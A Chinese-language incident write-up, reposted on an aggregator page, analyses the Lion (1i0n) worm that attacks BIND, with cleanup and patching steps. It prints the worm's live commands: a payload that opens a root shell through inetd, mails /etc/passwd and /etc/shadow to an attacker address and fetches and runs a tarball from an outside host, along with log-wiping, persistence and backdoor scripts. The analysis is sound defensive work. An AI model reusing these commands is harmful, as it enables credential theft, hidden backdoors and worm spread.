分享
 
 
 

1i0n蠕虫分析

王朝other·作者佚名  2008-05-18
窄屏简体版  字體: |||超大  

情况简介

开始,无意当中列了一下系统进程发现一个有趣的进程。

[acc@firework acc] $ps aux

.....

......

root 3440 99.9 0.5 1088 360 ? R 16:00 0:06 ./pscan xxx.xx 53

......

[root@firework /root]# ps aux | grep pscan

root 3833 97.0 0.5 1088 360 ? RN 16:38 0:10 ./pscan xxx.xx 53

[root@firework /root]# kill -9 3833

[root@firework /root]# ps aux | grep pscan

root 3839 55.5 0.5 1088 360 ? RN 16:38 0:01 ./pscan xxx.xx 53

[root@firework /root]# kill -9 3839

[root@firework /root]# ps aux | grep pscan

root 3845 99.9 0.5 1088 360 ? RN 16:38 0:01 ./pscan xxx.xx 53

以root权限杀死该进程后,又重新启动,有些古怪。

[acc@firework acc] $find / -name pscan -print

/dev/.lib/scan/pscan

/dev/.lib???

/dev/.lib存在,似乎该系统已经被入侵了。

事件分析

1阻止攻击。

我们检查日志信息和击键记录,发现日志系统在1.26被关闭。一些日志记录出现一些空白段,

表明被改过,没有其他信息,紧接着我们检查这些程序:

[acc@firework acc] $cd /dev/.lib

[acc@firework .lib] $ls

[acc@firework libb] $ls -al

total 20

drwxr-xr-x 4 root root 4096 Feb 01 13:15 .

drwxr-xr-x 4 root root 4096 Feb 01 12:30 ..

-rwxr-xr-x 1 root root 53 Feb 01 16:30 1i0n.sh

drwx------ 4 root root 4096 Feb 01 15:37 lib

drwxr-xr-x 2 root root 4096 Feb 01 16:03 scan

[acc@firework libb] $cat 1i0n.sh

#!/bin/sh

cd lib

./1i0n.sh &

cd ../scan

./1i0n.sh &

似乎是启动程序,启动./lib/1i0n.sh和./scan/1i0n.sh,先来看看./lib/1i0n.sh

[acc@firework libb] $cat lib/1i0n.sh |more

....

mv -f in.fingerd /usr/sbin/in.fingerd

mv -f ps /bin/ps

mv -f ifconfig /sbin/ifconfig

mv -f du /usr/bin/du

mv -f netstat /bin/netstat

mv -f top /usr/bin/top

mv -f ls /bin/ls

mv -f find /usr/bin/find

rm -fr /.bash_history

rm -fr /root/.bash_history

echo >/var/log/messages

echo >/var/log/maillog

[acc@firework libb] $

这是个是个善后处理放置后门的程序,再来看看./scan/1i0n.sh。

[acc@firework libb] $cat scan/1i0n.sh

#!/bin/sh

rm -f /etc/hosts.deny

echo "/dev/.lib/lib/scan/star.sh" >> /etc/rc.d/rc.sysinit /*开机启动star.sh*/

touch bindname.log

./star.sh

[acc@firework libb] $ cat scan/star.sh

#!/bin/sh

rm -f bindname.log; touch bindname.log

nohup ./scan.sh >>/dev/null & /*带nohup*/

nohup ./hack.sh >>/dev/null &

[acc@firework libb] $ cat scan/scan.sh

#!/bin/sh

while true /*所以杀不死该进程,

do 一杀死,scan.sh

CLASSB=`./randb` 又重新启动pscan*/

./pscan  $CLASSB 53

done

由于这台机器还在运行ps

[acc@firework libb] $

从进程的名字来看,这台机器可能正在被人利用,我们用sniffer监听,听到了很多类似的数据包。

54864(0) win 32120 <mss 1460,sackOK,timestamp 171000892 0,nop,wscale 0> (DF)

16:19:23.955554 eth0 > xxx.xxx.x.xx.4169 > xxx.xx.x.8.domain: S 1854598569:18545

98569(0) win 32120 <mss 1460,sackOK,timestamp 171000893 0,nop,wscale 0> (DF)

16:19:23.955636 eth0 > xxx.xxx.x.xx.4170 > xxx.xx.x.9.domain: S 1867025565:18670

25565(0) win 32120 <mss 1460,sackOK,timestamp 171000893 0,nop,wscale 0> (DF)

16:19:23.955694 eth0 > xxx.xxx.x.xx.4171 > xxx.xx.x.10.domain: S 1858702344:18587

02344(0) win 32120 <mss 1460,sackOK,timestamp 171000893 0,nop,wscale 0> (DF)

16:19:23.955759 eth0 > xxx.xxx.x.xx.4172 > xxx.xx.x.11.domain: S 1861784891:1861

784891(0) win 32120 <mss 1460,sackOK,timestamp 171000893 0,nop,wscale 0> (DF)

.....

似乎这个程序专门针对53端口,也就是named的,而且是个大范围扫描程序,可能在扫描后会把结果

发给攻击者,。

我们首先要切断连接,要杀掉这些进程。

[root@firework libb]#ps aux

root 4252 0.2 1.1 1648 752 pts/1 SN 17:48 0:00 sh ./scan.sh

root 4253 0.2 1.1 1648 748 pts/1 SN 17:48 0:00 sh ./hack.sh

root 4258 0.0 0.7 1252 460 pts/1 SN 17:48 0:00 tail -f bindname.

root 4262 99.9 0.5 1088 360 pts/1 RN 17:48 0:14 ./pscan xxx.xx 53

[root@firework libb]#kill -9 4252

[root@firework libb]#kill -9 4253

[root@firework libb]#kill -9 4258

[root@firework libb]#kill -9 4262

再看都杀掉了。

2应急处理

由于攻击者并没有篡改页面,只是利用此机器作为肉机,作为进一步攻击的基地。

我们简单查看了/dev/.lib/1i0n以及/dev/.lib/lib/1i0n.sh、/dev/.lib/scan/1i0n.sh

[acc@firework scan] $strings bind

PATH='/usr/bin:/bin:/usr/local/bin/:/usr/sbin/:/sbin';export PATH;export TERM=vt

100;rm -rf /dev/.lib;mkdir /dev/.lib;cd /dev/.lib;echo '1008 stream tcp nowait r

oot /bin/sh sh' >>/etc/inetd.conf;killall -HUP inetd;ifconfig -a>1i0n;cat /etc/p

asswd >>1i0n;cat /etc/shadow >>1i0n;mail 1i0nip@china.com <1i0n;rm -fr 1i0n;rm -

fr /.bash_history;lynx -dump http://coollion.51.net/crew.tgz >1i0n.tgz;tar -zxvf

1i0n.tgz;rm -fr 1i0n.tgz;cd lib;./1i0n.sh;exit;

.....

修改lsd-pl.net提供的exploit,很容易就可以加入这些代码。

>char command [] ="";

>write(sck[1],command,sizeof(command));

发现这是一个专门针对bind的蠕虫程序。

lib/1i0n.sh主要是入侵以后清理日志、bash_history,放置后门程序。

scan/1i0n.sh主要是启动两个程序,一个pscan扫描B网段(可选C网段),并把结果放置在

./bindname.log中,bind程序负责从bindname.log中提取结果进行自动攻击,攻击成功后放

置后门程序,并开始随机扫描。

我们在保留蠕虫样本后,对系统进行了简单恢复,

1、停止运行域名服务(准备升级)

2、修改/etc/rc.d/init.d/inetd.conf

删除 1008 stream tcp nowait root /bin/sh sh

1008 stream tcp nowait root /bin/sh sh

60008 stream tcp nowait root /bin/sh sh

33567 stream tcp nowait root /bin/sh sh

kill -9 pidof(nscd)

kill -9 pidof(t0rns)

3、修改/etc/rc.d/sysinit

删除 /dev/.lib/lib/scan/star.sh

/usr/sbin/nscd -q

/bin/in.telnetd

4、 删除如下目录和文件

/etc/ttyhash

/usr/man/man1/man1

/usr/src/.puta

/usr/info/.t0rn/

/usr/sbin/nscd

/dev/.lib

/bin/mjy

5、替换如下程序

/bin/login

/usr/sbin/nscd

/usr/sbin/in.telnetd

/sbin/ifconfig

/bin/ps

/usr/bin/du

/bin/ls

/bin/netstat

/usr/bin/find

/usr/bin/top

/usr/sbin/in.finger

6、修改/etc/inetd.conf

注释掉finger服务,并把权限改为nobody。

7、如有ipchains运行,请重新运行规则。

8、检查/var/spool/mqueue下用命令"grep "1i0nip@china.com" *",如发现有文件包含此字段,请

删除此文件。

9、如有必要,增加并修改你的hosts.deny文件

10、重启系统.

可疑之处:根据syslogd被宕掉,但从程序来看不应出现此现象,因此可能除去程序,有攻击者直接登录过。

技术分析

该蠕虫攻击程序的详细描述参照

bugtraq id 2302

cve CAN-2001-10

影响bind版本:

ISC bind 8.2 8.2.1 8.2.2 8.2.2-PX

不受影响

ISC BIND 9.1

ISC BIND 9.0

ISC BIND 8.2.3

通过对蠕虫样本的分析,我们可以看出其基本的工作流程

10in.sh---->./lib/10in.sh-->清理日志、放置后门程序(ssh、sniffer、ls、netstat etc..)

| -->获取系统信息并mail to 1i0nsniff@china.com

|

|

|

|-->./scan/10in.sh-->./pscan 对随机生成的B网段进行扫描

-->./bind 对有漏洞的系统进行攻击,攻击成功后首先获取网络配置、

passwd、shadow到10inip@china.com,放置后门并继续攻击其他机器。

[acc@firework acc] $ls /dev/.lib

/dev/.lib/lib/scan/1i0n.sh -----启动程序,调用./star.sh并把它加入开机启动

/dev/.lib/lib/scan/hack.sh -----一旦检测到在bindname.log中有新纪录,就调用

bindx.sh对目标进行攻击

/dev/.lib/lib/scan/bind -----利用TSIG漏洞进行攻击的程序(修改lsd-pl.net提供的)

/dev/.lib/lib/scan/randb -----随机产生一个B类网段,由pscan调用

/dev/.lib/lib/scan/scan.sh -----调用pscan  $(./randb) 53

/dev/.lib/lib/scan/pscan -----探测远程系统是否开启bind服务,如开启,记录

到bindname.log

/dev/.lib/lib/scan/star.sh -----调用sscan.sh和hack.sh

/dev/.lib/lib/scan/bindx.sh -----调用bind

/dev/.lib/lib/scan/bindname.log -----记录存在漏洞的主机IP

/dev/.lib/lib/1i0n.sh -----启动程序,启动lib/1i0n.sh、scan/1i0n.sh

/dev/.lib/lib/lib/netstat -----后门

/dev/.lib/lib/lib/dev/.1addr -----?(可能是为其他程序所用)

/dev/.lib/lib/lib/dev/.1logz

/dev/.lib/lib/lib/dev/.1proc

/dev/.lib/lib/lib/dev/.1file

/dev/.lib/lib/lib/t0rns -----sniffer程序

/dev/.lib/lib/lib/du -----后门

/dev/.lib/lib/lib/ls -----后门

/dev/.lib/lib/lib/t0rnsb -----清理日志

/dev/.lib/lib/lib/ps -----后门

/dev/.lib/lib/lib/t0rnp -----?

/dev/.lib/lib/lib/find -----后门

/dev/.lib/lib/lib/ifconfig -----后门

/dev/.lib/lib/lib/pg -----生成密码程序到/etc/ttyhash(login使用)

/dev/.lib/lib/lib/ssh.tgz -----ssh后门

/dev/.lib/lib/lib/top -----后门

/dev/.lib/lib/lib/sz -----修改文件大小

/dev/.lib/lib/lib/login -----后门

/dev/.lib/lib/lib/in.fingerd -----后门

/dev/.lib/lib/lib/1i0n.sh -----清除日志,放置后门

/dev/.lib/lib/lib/pstree -----后门

/dev/.lib/lib/lib/in.telnetd -----后门

/dev/.lib/lib/lib/mjy -----后门

/dev/.lib/lib/lib/sush -----?

/dev/.lib/lib/lib/tfn -----D.d.o.s工具

/dev/.lib/lib/lib/name -----没有改过的exploit

/dev/.lib/lib/lib/getip.sh -----获取网络、passwd等mail到1i0nsniffer@china.com

该蠕虫原理和ramen很像,不同的是ramen是个良性蠕虫,而此蠕虫的破坏性较大,并且窃取用户口令

文件、网络配置,应该说影响较大,因为即使用户发现,但是很多主机的用户名会为人所知,攻击面

较大,一旦被利用作为D.d.o.s攻击,后果将非常严重。

事故处理

William Stearns写了一个检测程序,但并不能清除该蠕虫。

下载: http://www.sans.org/y2k/lionfind-0.1.tar.gz

建议修补方法:按照应急处理一步一步来做,升级bind版本。

http://www.isc.org/products/BIND/bind9.html

后记:

sans上的有一些介绍http://www.sans.org/y2k/lion.htm

问题:有几个文件不知用处,象.t0rn/.1addr...。

如果你知道,请mail我一份。

该蠕虫似乎没有考虑到在攻击之前检查是否已经被感染,可能进行重复攻击。(named不重新启动过,再

次攻击也无效),目前我没有发现别的变种,该蠕虫自己不能复制,它通过coollion.51.net来获取蠕虫。

脚本或许写的比较急,有些.... :)

if test -n " $2" ; then

echo " ${BLU}#  ${BLU} Using ssh-port :  ${WHI} $2

 ${BLU}  ${RES}"

tar xfz ssh.tgz

echo "Port  $2" >> .t0rn/shdcf

echo "3  $2" >> dev/.1addr

cat .t0rn/shdcf2 >> .t0rn/shdcf ; rm -rf .t0rn/shdcf2

else

echo " ${BLU}#  ${RED} No ssh-port Specified, using default - 33568  ${

BLU} # ${RES}"

tar xfz ssh.tgz

echo "Port 33568" >> .t0rn/shdcf

echo "3  $2" >> dev/.1addr

cat .t0rn/shdcf2 >> .t0rn/shdcf ; rm -rf .t0rn/shdcf2

fi

 
 
 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
2023年上半年GDP全球前十五强
 百态   2023-10-24
美众议院议长启动对拜登的弹劾调查
 百态   2023-09-13
上海、济南、武汉等多地出现不明坠落物
 探索   2023-09-06
印度或要将国名改为“巴拉特”
 百态   2023-09-06
男子为女友送行,买票不登机被捕
 百态   2023-08-20
手机地震预警功能怎么开?
 干货   2023-08-06
女子4年卖2套房花700多万做美容:不但没变美脸,面部还出现变形
 百态   2023-08-04
住户一楼被水淹 还冲来8头猪
 百态   2023-07-31
女子体内爬出大量瓜子状活虫
 百态   2023-07-25
地球连续35年收到神秘规律性信号,网友:不要回答!
 探索   2023-07-21
全球镓价格本周大涨27%
 探索   2023-07-09
钱都流向了那些不缺钱的人,苦都留给了能吃苦的人
 探索   2023-07-02
倩女手游刀客魅者强控制(强混乱强眩晕强睡眠)和对应控制抗性的关系
 百态   2020-08-20
美国5月9日最新疫情:美国确诊人数突破131万
 百态   2020-05-09
荷兰政府宣布将集体辞职
 干货   2020-04-30
倩女幽魂手游师徒任务情义春秋猜成语答案逍遥观:鹏程万里
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案神机营:射石饮羽
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案昆仑山:拔刀相助
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案天工阁:鬼斧神工
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案丝路古道:单枪匹马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:与虎谋皮
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:李代桃僵
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:指鹿为马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:小鸟依人
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:千金买邻
 干货   2019-11-12
 
推荐阅读
 
 
 
>>返回首頁<<
 
靜靜地坐在廢墟上,四周的荒凉一望無際,忽然覺得,淒涼也很美
© 2005- 王朝網路 版權所有